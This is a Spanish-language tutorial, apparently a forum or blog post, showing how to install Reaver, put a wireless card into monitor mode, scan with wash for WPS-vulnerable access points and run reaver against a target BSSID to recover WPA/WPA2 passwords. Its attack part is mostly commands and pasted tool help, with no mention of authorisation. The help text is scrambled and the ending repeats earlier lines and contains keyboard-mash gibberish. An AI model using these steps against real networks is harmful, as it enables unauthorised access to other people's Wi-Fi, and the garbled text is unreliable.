Reaver Tutorial [wpa/wpa2]

*Reaver lo podes descargar aqui http://code.google.com/p/reaver-wps/downloads/list

O escribir en la terminalwget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
Luego Descomprimimostar -xvf reaver-1.4.tar.gz
Entramos en la carpetacd reaver-1.4/src
Despues lo instalamos con./configure
make
make install

Y listo ya lo tenemos instalado

Ahora a comprobar las redes vulnerables
* Ponemos nuestra targeta en modo monitor
airmon-ng start wlan0

*Para buscar las redes vulnerables escribimos

wash -i mon0

sintaxis de wash:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol
.com>
Required Arguments:
-i, --interface=<iface>
-f, --file [FILE1 FILE2 FILE3 ...]
Optional Arguments:
-c, --channel=<num>
-o, --out-file=<file>
-n, --probes=<num>
AP in scan mode [15]
-D, --daemonize
-C, --ignore-fcs
-5, --5ghz
-s, --scan
-u, --survey
-h, --help

Interface to capture packets on

Read packets from capture files

Channel to listen on [auto]

Write data to file
Maximum number of probes to send to each
Daemonize wash
Ignore frame checksum errors
Use 5GHz 802.11 channels
Use scan mode
Use survey mode [default]
Show help

Example:
wash -i mon0

*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal

y luego ejecutamos reaver
Ejemplo:Uso: reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv
Sintaxis de Reaver
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol
.com>
Required Arguments:
-i, --interface=<wlan>
-b, --bssid=<mac>
Optional Arguments:
-m, --mac=<mac>
-e, --essid=<ssid>
-c, --channel=<channel>
lies -f)

Name of the monitor-mode interface to use

BSSID of the target AP

MAC of the host system

ESSID of the target AP
Set the 802.11 channel for the interface (imp

-o, --out-file=<file>
-s, --session=<file>
-C, --exec=<command>
pin recovery
-D, --daemonize
-a, --auto
target AP
-f, --fixed
-5, --5ghz
-v, --verbose
-q, --quiet
-h, --help
Advanced Options:
-p, --pin=<wps pin>
-d, --delay=<seconds>
-l, --lock-delay=<seconds>
attempts [60]
-g, --max-attempts=<num>
-x, --fail-wait=<seconds>
lures [0]
-r, --recurring-delay=<x:y>
-t, --timeout=<seconds>
-T, --m57-timeout=<seconds>
-A, --no-associate
t be done by another application)
-N, --no-nacks
ackets are received
-S, --dh-small
-L, --ignore-locks
-E, --eap-terminate
acket
-n, --nack
-w, --win7

Send output to a log file [stdout]

Restore a previous session file
Execute the supplied command upon successful
Daemonize reaver
Auto detect the best advanced options for the
Disable channel hopping
Use 5GHz 802.11 channels
Display non-critical warnings (-vv for more)
Only display critical messages
Show help

Use the specified 4 or 8 digit WPS pin

Set the delay between pin attempts [1]
Set the time to wait if the AP locks WPS pin
Quit after num pin attempts
Set the time to sleep after 10 unexpected fai
Sleep for y seconds every x pin attempts
Set the receive timeout period [5]
Set the M5/M7 timeout period [0.20]
Do not associate with the AP (association mus
Do not send NACK messages when out of order p
Use small DH keys to improve crack speed
Ignore locked state reported by the target AP
Terminate each WPS session with an EAP FAIL p
Target AP always sends a NACK [Auto]
Mimic a Windows 7 registrar [False]

Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas
Aqui les dejo algunos Y listo ya lo tenemos instalado
Ahora a comprobar las redes vulnerables
jhjbkjbfvkjbdkjfbvkjdnfv
jbjdbnfvjndflnvlkdnvkv

knvklndklvnkldnmvkmnmkm
* Ponemos nuestra targeta en modo monitor
airmon-ng start wlan0